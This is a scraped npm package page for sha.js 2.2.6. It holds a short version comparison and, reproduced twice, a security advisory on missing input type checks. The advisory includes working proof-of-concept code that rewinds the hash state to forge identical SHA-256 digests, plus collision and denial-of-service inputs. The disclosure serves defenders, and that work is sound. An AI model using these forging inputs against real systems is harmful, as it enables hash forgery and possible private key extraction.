Version Details and Security Vulnerabilities

📦

sha.js

2.2.6

Comparision Betweeen 2.2.6 and 2.2.5

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Version 2.2.6 Details

Sha.js is a lightweight JavaScript library providing streaming SHA-1 hash functionality, ideal for browser and Node.js environments. Comparing versions 2.2.6 and 2.2.5 reveals subtle but impactful changes primarily in dependency management. Version 2.2.6 removes the direct dependency on the global package, potentially streamlining the build process and reducing the overall package size. This suggests an optimization where relying on the global context is no longer explicitly needed, possibly due to code enhancements or a shift in how the library interacts with its environment.

Both versions maintain the same core functionality – streaming SHA-1 hashing – along with the MIT license, allowing for flexible integration into various projects. They share common development dependencies like tape for testing, buffer for handling binary data, and typedarray for array manipulation. The update from 2.2.5 to 2.2.6, released just two days apart, likely addresses minor bug fixes, performance tweaks, or internal code restructuring, reflecting a commitment to stability and efficiency. Developers should note that previous versions relied on global package. If that's important for a project, the 2.2.5 is the version to choose.

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

sha.js

2.2.6

Comparision Betweeen 2.2.6 and 2.2.5

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Version 2.2.6 Details

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 2.2.6 of the package sha.js.

All Security Vulnerabilities

All the vulnerabilities related to the version 2.2.6 of the package

Summary:

sha.js is missing type checks leading to hash rewind and passing on crafted data

Details:

Summary

This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation.

Missing input type checks can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.

Details

See PoC

PoC

const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])

const sha = require('sha.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = sha('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever

const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])

Output:

638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe

Or just:

> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'

Impact

Hash state rewind on {length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.
Value miscalculation, e.g. a collision is generated by { length: buf.length, ...buf, 0: buf[0] + 256 } This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js)
DoS on {length:'1e99'}
On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration)

Details about sha.js@2.2.6

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 2.2.6 of the package sha.js.

All Security Vulnerabilities

All the vulnerabilities related to the version 2.2.6 of the package

Summary:

sha.js is missing type checks leading to hash rewind and passing on crafted data

Details:

Summary

This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation.

Details

See PoC

PoC

const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])

const sha = require('sha.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = sha('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever

const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])

Output:

638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe

Or just:

> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'

Impact

Hash state rewind on {length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.
Value miscalculation, e.g. a collision is generated by { length: buf.length, ...buf, 0: buf[0] + 256 } This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js)
DoS on {length:'1e99'}
On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration)

Details about sha.js@2.2.6

Version Details and Security Vulnerabilities

sha.js

Comparision Betweeen 2.2.6 and 2.2.5

Version 2.2.6 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

sha.js

Comparision Betweeen 2.2.6 and 2.2.5

Version 2.2.6 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Summary

Details

PoC

Impact

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Summary

Details

PoC

Impact

Version Details and Security Vulnerabilities

sha.js

Comparision Betweeen 2.2.6 and 2.2.5

Version 2.2.6 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

sha.js

Comparision Betweeen 2.2.6 and 2.2.5

Version 2.2.6 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

sha.js@2.2.6 GHSA-95m3-7q98-8xr5 9.1

Summary

Details

PoC

Impact

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

sha.js@2.2.6 GHSA-95m3-7q98-8xr5 9.1

Summary

Details

PoC

Impact